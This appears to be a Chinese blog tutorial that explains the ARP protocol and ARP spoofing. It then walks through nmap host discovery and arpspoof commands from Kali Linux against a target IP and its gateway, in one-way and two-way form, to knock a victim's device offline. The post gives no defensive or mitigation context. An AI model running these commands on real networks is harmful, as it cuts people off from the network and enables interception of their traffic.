ARP协议

ARP(Address Resolution Protocol,地址解析协议)是一个位于TCP/IP协议栈中的网络层,负责将某个IP地址解析成对应的MAC地址。

基本功能

通过目标设备的IP地址,查询目标设备的MAC地址,以保证通信的进行。

ARP攻击的局限性

ARP攻击仅能在以太网(局域网如:机房、内网、公司网络等)进行。

无法对外网(互联网、非本区域内的局域网)进行攻击。

ARP攻击的攻击原理

ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗,能够在网络中产生大量的ARP通信量使网络阻塞,攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目,造成网络中断或中间人攻击。

准备工作

环境:kali-linux

工具:arpspoof

获取自己的网卡,IP,网关信息。

ifconfig
ip a

获取目标ip与网关信息。

nmap -sP 10.3.138.1/24

断网攻击

arpspoof -i eth0 -t 192.168.8.100 192.168.8.8

双向攻击(即欺骗靶机也欺骗路由器)

arpspoof -i eth0 -t 192.168.8.8 192.168.8.100

攻击完成,此时被攻击手机无法上网。(ctrl+Z)(ctrl+C)可停止攻击

群体攻击

此处内容需要评论回复后(审核通过)方可阅读。

最后修改:2020 年 09 月 25 日 03 : 42 PM
如果觉得我的文章对你有用,请随意赞赏